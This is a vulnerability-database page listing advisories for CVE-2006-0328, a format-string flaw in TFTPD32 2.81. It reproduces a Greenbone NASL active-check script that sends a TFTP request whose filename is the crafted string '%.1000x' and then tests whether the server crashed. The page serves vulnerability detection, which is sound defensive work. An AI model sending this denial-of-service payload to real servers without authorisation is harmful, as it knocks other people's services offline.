| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| Update Protection against Tftpd32 Request Error Message Format String Vulnerability | 26 Mar 200600:00 | – | checkpoint_advisories | |
| TFTPD32 Request Filename Handling Error Format String Denial of Service - Ver2 (CVE-2006-0328) | 18 May 201500:00 | – | checkpoint_advisories | |
| CVE-2006-0328 | 21 Jan 200600:00 | – | cve | |
| CVE-2006-0328 | 21 Jan 200600:00 | – | cvelist | |
| CVE-2006-0328 | 21 Jan 200600:03 | – | nvd | |
| Format string | 21 Jan 200600:03 | – | prion | |
| Tftpd32 Error Message Format String | 20 Jan 200600:00 | – | nessus | |
| Wyse Simple Imager (WSI) includes vulnerable versions of TFTPD32 | 19 Nov 200900:00 | – | cert |
| Source | Link |
|---|---|
| xforce | www.xforce.iss.net/xforce/xfdb/24250 |
| kb | www.kb.cert.org/vuls/id/632633 |
| secunia | www.secunia.com/advisories/18539 |
| securityfocus | www.securityfocus.com/bid/16333 |
| exploit-db | www.exploit-db.com/exploits/1424 |
| securityfocus | www.securityfocus.com/archive/1/422405 |
# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.902835");
script_version("2026-03-17T05:57:28+0000");
script_cve_id("CVE-2006-0328");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_tag(name:"last_modification", value:"2026-03-17 05:57:28 +0000 (Tue, 17 Mar 2026)");
script_tag(name:"creation_date", value:"2012-05-23 14:14:14 +0530 (Wed, 23 May 2012)");
script_name("TFTPD32 2.81 Request Error Message Format String Vulnerability - Active Check");
script_xref(name:"URL", value:"http://secunia.com/advisories/18539");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/16333");
script_xref(name:"URL", value:"http://www.kb.cert.org/vuls/id/632633");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/24250");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/1424");
script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/422405");
script_category(ACT_DENIAL);
script_copyright("Copyright (C) 2012 Greenbone AG");
script_family("Denial of Service");
script_dependencies("tftpd_detect.nasl", "global_settings.nasl", "os_detection.nasl");
script_require_udp_ports("Services/udp/tftp", 69);
script_mandatory_keys("tftp/detected", "Host/runs_windows");
script_exclude_keys("keys/TARGET_IS_IPV6");
script_tag(name:"impact", value:"Successful exploitation will allow attacker to cause a denial of service.");
script_tag(name:"affected", value:"TFTPD32 version 2.81 is known to be affected. Other versions
might be affected as well.");
script_tag(name:"insight", value:"The flaw is due to a format string error when the filename received in
a TFTP request is used to construct an error message. This can be exploited
to crash the application via a TFTP request packet containing a specially crafted filename.");
script_tag(name:"solution", value:"Update to version 2.8.2 or later.");
script_tag(name:"summary", value:"TFTPD32 is prone to a format string vulnerability.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_analysis");
exit(0);
}
if(TARGET_IS_IPV6())
exit(0);
include("tftp.inc");
include("misc_func.inc");
include("port_service_func.inc");
port = service_get_port(default:69, proto:"tftp", ipproto:"udp");
if(!tftp_alive(port:port))
exit(0);
tftp_get(path:"%.1000x", port:port);
if(!tftp_alive(port:port)) {
security_message(port:port, proto:"udp");
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation